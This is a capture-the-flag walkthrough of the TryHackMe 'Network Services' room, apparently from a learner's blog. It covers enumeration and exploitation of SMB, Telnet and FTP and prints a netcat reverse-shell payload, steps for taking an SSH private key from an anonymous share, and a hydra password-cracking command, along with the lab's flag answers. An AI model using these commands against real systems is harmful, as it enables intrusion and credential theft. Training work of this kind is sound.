TryHackMe: Network Services  1 - Walkthrough

Welcome! In this walkthrough of the TryHackMe: Networking Services room we will cover a variety of network services, specifically SMB, Telnet & FTP.

Room URL: https://tryhackme.com/room/networkservices
Prerequisites: Linux knowledge (https://tryhackme.com/module/linux-fundamentals)

I am making these walkthroughs to keep myself motivated to learn cyber security, and ensure that I remember the knowledge gained by THMs rooms. Join me on learning cyber security. I will try and explain concepts as I go, to differentiate myself from other walkthroughs.

Task 1: Get connected

In this room we will cover different network service vulnerabilities. There is not much more to talk about then to start up the host machine and continue reading!

Questions

Ready? Let’s get going!

Answer: No answer needed

Task 2: Understanding SMB

SMB — Server Message Block Protocol — is a client-server communication protocol used for sharing access to files, printers, serial ports and other resources on a network.

Since SMB is a response-request type of protocol, multiple messages get send between client and server before establishing a connection. Therefore, clients connect to the server using TCP/IP, and because of this we can see the three-way handshake in use.

Microsoft Windows has included SMB protocol support since Windows 95. Unix machines can use Samba, an open source server that support the SMB protocol.

Questions

What does SMB stand for?

Answer: Server Message Block

What type of protocol is SMB?

The SMB protocol is known as a response-request protocol, meaning that it transmits multiple messages between the client and server to establish a connection.

Answer: response/request

What do clients connect to servers using?

Clients connect to servers using TCP/IP.

Answer: TCP/IP.

What systems does Samba run on?

Samba is an open source server that supports the SMB protocol and runs on Unix systems.

Answer: Unix.

Task 3: Enumerating SMB

It’s time for some enumeration, which is the process of gathering information on a target in order to find potential attack vectors and aid in exploitation. Information we gather can be related to network information, usernames, passwords, host names, data, services and more!.

SMB share drives can often be used to save sensitive information, so they are a great starting point for an attack! But first we need to do some port scanning to gather info on the systems, services and application of the target machine.

For this we will use nmap, the most popular port scan tool available. Afterwards we will use Enum4linux (a wrapper around the tool in the Samba package) to gather info (‘enumerate’) on the SMB system that we will soon discover.

Questions

Conduct an nmap scan of your choosing, How many ports are open?

Nmap features three basic scan types which can be specified by adding their specific flag to the command. These are:

• TCP Connect Scans (-sT)
• SYN “Half-open” Scans (-sS) — This is the default!
• UDP Scans (-sU)

Since the SYN scan is the default, we can simply run nmap without providing a scan type flag. Before we move on we can add the target machine ip address to an environmental variable:

export ip=10.10.39.142 # change to your specific target machine id

Now we can use the variable by writing $id in our terminal.

nmap $ip -vv

The -vv flag increases the verbosity, meaning that we get more info on the process.

After running the command we get the following results:

Answer: 3

What ports is SMB running on?

SMB requires different network ports on a machine to enable communications with other systems. SMB originally ran on top of NetBIOS, which uses port 139. NetBIOS is an older transport layer which allows computers to talk to each other on the network. The SMB protocol runs on port 445, but may rely on NetBIOS to communicate with old devices that do not support the direct hosting of SMB over TCP/IP.

Answer: 139/445.

Let’s get started with Enum4Linux, conduct a full basic enumeration. For starters, what is the workgroup name?

Now we know that SMB is setup on the machine, we can use Enum4Linux to discover more info about the system.

We can use the following command:

enum4linux $ip -a

If you look carefully through the results the following shows up:

Answer: WORKGROUP.

What comes up as the name of the machine?

The correct answer is on the same image above as before, but can also be seen other places in the output:

Answer: POLOSMB

What operating system version is running?

On the same image as before we can also see the os version output.

Answer: 6.1

What share sticks out as something we might want to investigate?

To understand this question it is necessary to understand what a share means. A share makes a directory accessible to SMB clients on the network. A SMB client sees only the share name, not the server’s path to the shared directory. Shares are commonly used to provide network access to home directories on a network file server. Each user is assigned a home directory. A share is persistent and remains defined regardless of whether users are connected to the server. Source

Again, looking at the information returned by running enum4linux, we can see the following:

The share ‘profiles’ look very interesting, and apparently provide info on different users.

Answer: profiles

Task 4: Exploiting SMB

Now we need to access the SMB share, which can be done by ‘SMBClient’, available on Kali Linux. We can access the SMB share using the following syntax:

smbclient //[IP]/[SHARE]

Followed by the following flags:

• U [name] : to specify the user
• p [port] : to specify the port

More info can be found here:

https://www.samba.org/samba/docs/current/man-html/smbclient.1.html

Questions

What would be the correct syntax to access an SMB share called “secret” as user “suit” on a machine with the IP 10.10.10.2 on the default port?

This one is pretty obvious.

Answer: smbclient //10.10.10.2/secret -U suit -p 445

Does the share allow anonymous access? Y/N?

Lets see if our interesting share has been configured to allow anonymous access. We can do this easily by:

• connecting to the share we found during the enumeration stage (‘profiles’)
• using the username “Anonymous”
• and not supplying a password.

We can therefore use the following syntax.

smbclient //$ip/profiles -U Anonymous

Yes, that worked!

Answer: Y

Who can we assume this profile folder belongs to?

Writing ls in the terminal shows the following files:

‘Working From Home Information.txt’ sure sounds interesting! Let’s read it with the use of:

more "Working From Home Information.txt"

We use ‘more’ here, as less and cat are not available. All three are normally used to read files. The command outputs the following:

Answer: John Cactus

What service has been configured to allow him to work from home?

The image gives an answer to this question as well.

Answer: SSH

SSH provides Secure Shell access from one system into another, and its strong encryption makes it the perfect to for issuing remote commands and managing network infrastructure. To provide access to the remote system, you need to have a pair of SSH keys (one public, and one private). It is important never to share your private key!

Now we know this, what directory on the share should we look in?

SSH keys are per default saved in the /HOME/.ssh/ directory.

Answer: .ssh

This directory contains authentication keys that allow a user to authenticate themselves on, and then access, a server. Which of these keys is most useful to us?

Let’s move into the .ssh directory, by writing cd .ssh, followed by listing the contents of the directory (ls).

There are two files, id_rsa and id_rsa.pub. The latter file is the public key and is not necessarily interesting to us. But we are interesting in the private key, which should never be shared by others!

Answer: id_rsa

Download the private key to your local machine, and change the permissions to “600” using “chmod 600 [file]”. Now, use the information you have already gathered to work out the username of the account. Then, use the service and key to log-in to the server. What is the smb.txt flag?

We can download the private key with the following command:

mget id_rsa (followed by confirming with "y")

Before leaving the smb access, we need to find an username. This can be found by reading the public key file (more id_rsa.pub). The user name (cactus) is found at the end:

We can now leave the smb access by pressing control C.

The file should now be in the current directory of your attacker machine. Change the permission of the file by writing: chmod 600 id_rsa. This makes it so that only the current user can read/write the file.

Before being able to get access we need to move the private key to our .ssh directory: mv id_rsa /root/.ssh

Now all pieces are in place. Simply gain ssh access by writing:

ssh cactus@$ip

Note: Instead of moving the key to our .ssh folder, we could also have put it somewhere else and add the -i flag to our ssh command. For example:

ssh cactus@ip -i id_rsa.

Listing the files shows us the file smb.txt. We found the flag! Open it and find the answer.

Answer: THM{smb_is_fun_eh?}

Task 5: Understanding Telnet

Telnet is an application protocol which, through a telnet client, allows you to connect to, and run commands on, a remote system hosting a telnet server. Sounds like SSH you might ask? The difference is that telnet sends all messages in clear, unencrypted text. This is the reason that SSH has replaced telnet in most implementations.

Questions

What is Telnet?

Answer: application protocol

What has slowly replaced Telnet?

SSH, due to the lacking security of telnet.

Answer: ssh

How would you connect to a Telnet server with the IP 10.10.10.3 on port 23?

Simply write telnet followed by the ip address.

Answer: telnet 10.10.10.3 23

The lack of what, means that all Telnet communication is in plaintext?

Answer: encryption

Task 6: Enumerating Telnet

Let’s get hacking! We will start by using nmap to do some port scanning.

Questions

How many ports are open on the target machine?

Before moving on, let’s set an environmental variable equal to the ip address of the target machine.

export ip= 10.10.8a.73 # change to your specific target machine id

Now we can proceed doing a network scan:

nmap $ip -p- -vv -T5

(Adding the -p- flag means all ports get checked instead of just the first 1000, the -T5 flag makes the process quite a bit quicker).

This is a process which may take 10–15 minutes! But it results in the following:

The results are therefore:

Result: 1

What port is this?

Result: 8012

This port is unassigned, but still lists the protocol it’s using, what protocol is this?

Answer: tcp

Now re-run the nmap scan, without the -p- tag, how many ports show up as open?

Answer: 0

Telnet runs on port 23 per default, but in this case it does not. Therefore it is important to use the -p- flag to scan all ports.

Note: You can use -oN <filename> to output the results to a file. This makes it easier to read the results and avoid having to rerun a test if you happened to close your terminal.

Note 2: From now on you can just focus your scanning on this single port. Eg:

 nmap $ip -p 8012 -v -On nmap-output.out.

Based on the title returned to us, what do we think this port could be used for?

There is a lot of info coming out of the scan, but SKIDY’S BACKDOOR pops up, which sure does sound like a title!

Answer: SKIDY’S BACKDOOR

Who could it belong to? Gathering possible usernames is an important step in enumeration.

This one is pretty easy with the last answer in mind.

Answer: Skidy

Task 7: Exploiting Telnet

Telnet, like other protocols, have some Common Vulnerabilities and Exposures (CVE). To read more info about these you can search on sites such as:

• https://www.cvedetails.com/
• https://cve.mitre.org/

However, it is more common to find weaknesses caused by misconfiguration of systems.

In this case, we found out that the service name is backdoor, and we have a username called ‘Skiby’. Since this assignment is concerning telnet, our objective is to connect to the service with the following syntax: “telnet [ip] [port]”. In this particular case we want to establish a reverse shell, meaning that the target machine communicates back to our attacking machine.

Questions

Let’s start connecting to the service with the following syntax:

telnet $ip 8012

This gives us access and we have entered a shell.

Great! It’s an open telnet connection! What welcome message do we receive?

Answer: SKIDY’S BACKDOOR

Nothing happens when we enter commands, answering the next question.

Let’s try executing some commands, do we get a return on any input we enter into the telnet session? (Y/N)

Answer: N

Now, use the command “ping [local THM ip] -c 1” through the telnet session to see if we’re able to execute system commands. Do we receive any pings? Note, you need to preface this with .RUN (Y/N)

This gets pretty complicated for a beginner. We need to write:

sudo tcpdump ip proto \\icmp -i eth0

when using a Attackbox, or

sudo tcpdump ip proto \\icmp -i tun0  when using OpenVPN.

The -i flag specifies the interface to listen to.

This will cause our attacker machine to start listening for ICMP traffic (pings). Now we go back to our telnet shell and write the following:

.RUN ping [local THM ip] -c 1

Note this is the IP of the attacker machine. We need to send a ping from the telnet service to our attacker machine, to see if we receive the ping.

We do! The answer to our question is therefore Yes.

Answer: Y

Now we need to generate a reverse shell payload using msfvenom. This will generate and encode a netcat reverse shell for us. Here’s our syntax:

msfvenom -p cmd/unix/reverse_netcat lhost=[local tun0 ip] lport=4444 R

-p = payload
lhost = our local host IP address (this is your machine’s IP address)
lport = the port to listen on (this is the port on your machine)
R = export the payload in raw format

What word does the generated payload start with?

Let’s run the following script:

msfvenom -p cmd/unix/reverse_netcat lhost=[local machine ip] lport=4444 R

This gives us the payload: mkfifo /tmp/wanws; nc 10.10.81.157 4444 0</tmp/wanws | /bin/sh >/tmp/wanws 2>&1; rm /tmp/wanws

Answer: mkfifo

Now we need to start a netcat listener on our local machine, with the use of the following syntax: “nc -lvp [listening port]”

What would the command look like for the listening port we selected in our payload?

We specified 4444 as the listening port on our generated payload, so the answer is the following:

Answer: nc -lvp 4444

Run this command on the local (attacking) machine, and finally, run the payload. In my case:

mkfifo /tmp/pzcq; nc 10.10.81.157 4444 0</tmp/pzcq | /bin/sh >/tmp/pzcq 2>&1; rm /tmp/pzcq

This should give a shell on the target machine.

Answer: THM{y0u_g0t_th3_t3ln3t_fl4g}

Task 8: Understanding FTP

That’s it. Time to look at some FTP. File Transfer Protocol (FTP) is a protocol for the transfer of files over a network. It uses a client-server model for this, which means that the client creates a connection with the server, which in turn validates credentials and opens a session.

FTP uses two channels:

1. Command channel: used to transfer commands as well as replies to these commands.
2. Data channel: transfers data.

A FTP server can accepts two type of connections:

1. Active: The client opens a port and listens. The server is required to actively connect to it.
2. Passive: The server opens a port and listens (passively) and the client connects to it

Questions

What communications model does FTP use?

Answer: client-server

What’s the standard FTP port?

Answer: 21

How many modes of FTP connection are there?

Answer: 2

Task 9: Enumerating FTP

Similar to the SMB assignment, we are going to try to get anonymous access to a server (FTP in this case), to find some information we can use to get shell access into the system. It’s time to start hacking!

Questions

Run an nmap scan of your choice.How many ports are open on the target machine?

Let’s start by setting an environmental variable equal to our target ip.

export ip = <the target ip address>

Let’s run a scan:

nmap $ip -A -vv

This returns one port, which unfortunately is not the right answer. Let’s run a deeper scan running with more ports:

nmap $ip -A -p- -vv

The two open ports on the system

Now we found two, which is right!

Answer: 2

What port is ftp running on?

Answer: 21

What variant of FTP is running on it?

We can get more info by running:

nmap $ip -p 21 -sV.

This shows the version, and can apparently also tell us that anonymous login is allowed, nice! And there is a text file in there as well!

Answer: vsftpd

What is the name of the file in the anonymous FTP directory?

The scan already told us this, but let us try logging in. We can try logging on to the system by typing “ftp [IP]” into the console, and entering “anonymous”, and no password when prompted. And voila:

Answer: PUBLIC_NOTE.txt

What do we think a possible username could be?

We can read the text by writing:

 get PUBLIC_NOTICE.txt -.

Seems the username could be Mike!

Answer: mike

Task 10: Exploiting FTP

Now it’s time to see if we can crack mike’s password. For this we can use hydra. Hydra is a quick online password cracking tool, which can perform rapid dictionary attacks against many protocols, including Telnet, RDP, SSH, FTP, HTTP, HTTPS, SMB, several databases and much more.

Questions

What is the password for the user “mike”?

The syntax for this is pretty much given to us:

hydra -t 4 -l mike-P /usr/share/wordlists/rockyou.txt -vV $ip ftp

Answer: password

What is ftp.txt?

Bingo! Now, let’s connect to the FTP server as this user using “ftp [IP]” and entering the credentials when prompted. Entering ftp $ip gives us access and we are now able to see all files by writing dir.

To get the flag enter:

get ftp.txt-

Answer: THM{y0u_g0t_th3_ftp_fl4g}

Task 11: Expanding Your Knowledge

Nothing to do here but reflect on the things we learned in the Network Services 1 room! We learned about protocols such as SMB, telnet, SSH & FTP. In addition we got more experience with nmap, and learned to use nc, metasploit, tcpdump and hydra. I really hope you learned something new from this walkthrough of the Network Services room on TryHackMe.

Pretty awesome! Thanks for reading and let me know if you like this article, and if I should write more!

My walkthrough on the Network Services 2 room can be found here. Find my other walkthroughs here.

Like my articles?

You are welcome to support me by buying me a cup of coffee:

I learned a lot through HackTheBox’s Academy. If you want to sign up, you can get extra cubes, and support me in the process, if you use the following link:

https://referral.hackthebox.com/mzwwXlg